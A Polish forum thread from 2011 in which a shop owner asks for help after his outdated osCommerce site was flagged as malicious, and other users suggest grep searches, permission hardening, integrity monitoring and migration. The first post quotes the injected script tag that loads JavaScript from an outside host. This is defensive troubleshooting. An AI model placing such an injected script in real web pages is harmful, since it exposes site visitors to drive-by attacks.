Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!

Ogłoszenie

Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.

#1  2011-05-20 07:43:38

  Paad - Użytkownik

Paad
Użytkownik
Skąd: Częstochowa
Zarejestrowany: 2009-02-22

zhackowany oscommerce

Cześć

Mam problem ze sklep internetowym - jest to stara wersja pisana pod php3/4 (rok 2003).
Następnie przez te parę lat zamiast aktualizować sklep, kolejni specjaliści dopisywali sami nowe funkcje do tej wersji.
Dziś żadnego z nich nie ma, a ja mam problem - może ktoś z Was będzie umiał mi pomóc.

Po wejściu na stronę mam "piękny" komunikat "Strona zgłoszona jako dokonująca ataków!", a google webmasters informuje mnie, że na stronie znajduje się podejrzany kod:

Kod:

<script src="http://chadon.nl/st/js/jquery.js">

Niestety nigdzie tego kodu nie mogę znaleźć.

Czy miał ktoś z Was taki problem i zechce podzielić się rozwiązaniem, lub pomysłem na rozwiązanie?


Pozdrawiam

Ostatnio edytowany przez Paad (2011-05-20 07:44:00)

Offline

 

#2  2011-05-20 08:19:23

  winnetou - złodziej wirków ]:->

winnetou
złodziej wirków ]:->
Skąd: Jasło/Rzeszów kiedyś Gdańs
Zarejestrowany: 2008-03-31
Serwis

Re: zhackowany oscommerce

Z doświadczenia (zawodowego) powiem tylko jedno: wypierdziel osc w pizdu.
Jest bardziej dziurawy niż ser szwajcarski. Ostatni expolit wyszedł na niego w niedzielę, do tego są 2 czy 3 luki ze statusem krytyczny niezałatane od 2004 roku
http://secunia.com/advisories/product/1308/?task=statistics
http://secunia.com/advisories/product/1308/
Czyszczenie osc to syzyfowa praca - załatasz raz, poprawisz - pozyjesz w spokoju miesiąc góra dwa.


LRU: #472938
napisz do mnie: ola@mojmail.eu
Hołmpejdż | Galerie | "Twórczość" || Free Image Hosting

Offline

 

#3  2011-05-20 08:54:53

  kamikaze - Administrator

kamikaze
Administrator
Zarejestrowany: 2004-04-16

Re: zhackowany oscommerce

Paad napisał(-a):

Po wejściu na stronę mam "piękny" komunikat "Strona zgłoszona jako dokonująca ataków!", a google webmasters informuje mnie, że na stronie znajduje się podejrzany kod:

Kod:

<script src="http://chadon.nl/st/js/jquery.js">

Niestety nigdzie tego kodu nie mogę znaleźć.

No chyba musisz jednak poszukać tego, może grep na katalogu z kodem pomoże. Albo podaj adres strony to poszukamy.

Offline

 

#4  2011-05-20 09:32:53

  Paad - Użytkownik

Paad
Użytkownik
Skąd: Częstochowa
Zarejestrowany: 2009-02-22

Re: zhackowany oscommerce

dawałem grep'a ale nic nie znalazłem, chyba że źle

Kod:

grep -i -w chadon * -R

Znalazłem jakąś kopię, w której nie ma tego kodu - narazie ją wrzuciłem i zgłosiłem do weryfikacji przez google.

Tylko na FF mi się CSS rozjechał;/

Ostatnio edytowany przez Paad (2011-05-20 09:33:27)

Offline

 

#5  2011-05-20 09:40:23

  djjanek - Użytkownik

djjanek
Użytkownik
Skąd: whereis
Zarejestrowany: 2007-11-15
Serwis

Re: zhackowany oscommerce

A może poszukaj też w bazie danych :) miałem podobny problem. Dodatkowo przejrzyj sobie htacces popraw go i daj mu prawa tylko do odczytu, po drugie zmień odwołanie do panelu admina, po trzecie zabezpiecz jak najbardziej prawami dostępu do plików. Ja całe szczęście już nie używam tego badziewia, ale ostatnio przez pół roku zmagałem się z tym :)

Offline

 

#6  2011-05-20 09:59:19

  Paad - Użytkownik

Paad
Użytkownik
Skąd: Częstochowa
Zarejestrowany: 2009-02-22

Re: zhackowany oscommerce

djjanek napisał(-a):

A może poszukaj też w bazie danych :) miałem podobny problem. Dodatkowo przejrzyj sobie htacces popraw go i daj mu prawa tylko do odczytu, po drugie zmień odwołanie do panelu admina, po trzecie zabezpiecz jak najbardziej prawami dostępu do plików. Ja całe szczęście już nie używam tego badziewia, ale ostatnio przez pół roku zmagałem się z tym :)

W bazie nie ma na 100% bo zaimportowałem ją do siebie na laptopa i sprawdziłem na mojej wersji - było ok.

Offline

 

#7  2011-05-20 10:06:47

  kamikaze - Administrator

kamikaze
Administrator
Zarejestrowany: 2004-04-16

Re: zhackowany oscommerce

Paad napisał(-a):

dawałem grep'a ale nic nie znalazłem, chyba że źle

Kod:

grep -i -w chadon * -R

Z -w to raczej nie ma szans na znalezienie tego, nie wiem tez po co *. Daj tak:

Kod:

grep -inr chadon .

Kropa na końcu to bierzący katalog, odpal po wejściu do katalogu z kodem.

Offline

 

#8  2011-05-20 10:10:12

  Paad - Użytkownik

Paad
Użytkownik
Skąd: Częstochowa
Zarejestrowany: 2009-02-22

Re: zhackowany oscommerce

@kamikaze
Nic nie znalazło

@all
Co polecacie zamiast oscommerce'a ?

Offline

 

#9  2011-05-20 10:52:28

  Jacekalex - Podobno człowiek...;)

Jacekalex
Podobno człowiek...;)
Skąd: /dev/random
Zarejestrowany: 2008-01-07

Re: zhackowany oscommerce

OScommerce, to jedna wielka dziura w bezpieczeństwie, jak praktycznie  każdy CMS.

Potraktuj go programem AIDE lub podobnym, żeby móc w każdej chwili sprawdzić, w którym pliku są zmiany.

Poza tym Oscommerce można zabezpieczac przez REWRITE i ustawienia php z jednej strony, ja radziłbym natomiast radziłbym , o ile jest możliwość, pomajstrować przy uprawnieniach w Mysql - aby ustawić dla skryptów minimalne uprawnienia, natomiast same skrypty zaszyfrował przez ioncube, i porządnie zrobił uprawnienia, do tego folder Administarator wyniósł do jakiejś ukrytej lokalizacji.

W dodatku, jeśli masz Register Globals włączone, to współczuję, ale można Rewritem powstrzymać sporo ataków RG, trochę z tym zabawy jest, ale wykonalne.

Przepis kiedyś był na forum oscommerce (już nie istniejącym).

Jeśli natomiast to wykonalne, to radzę przeprowadzkę na coś aktualnego typu Oscpmmerce-2.3 (do niego powinna pasować większośc dodatków), Oscommerce 3.*, PrestaShop czy Virtuemart.

To by było na tyle
;-)

Ostatnio edytowany przez Jacekalex (2011-05-20 11:46:55)


W demokracji każdy naród ma taką władzę, na jaką zasługuje ;)
Si vis pacem  para bellum  ;)       |       Pozdrawiam :)

Offline

 

#10  2011-05-20 10:55:10

  winnetou - złodziej wirków ]:->

winnetou
złodziej wirków ]:->
Skąd: Jasło/Rzeszów kiedyś Gdańs
Zarejestrowany: 2008-03-31
Serwis

Re: zhackowany oscommerce

albo magentoo


LRU: #472938
napisz do mnie: ola@mojmail.eu
Hołmpejdż | Galerie | "Twórczość" || Free Image Hosting

Offline

 

Stopka forum

Powered by PunBB
© Copyright 2002–2005 Rickard Andersson
Nas ludzie lubią po prostu, a nie klikając w przyciski ;-)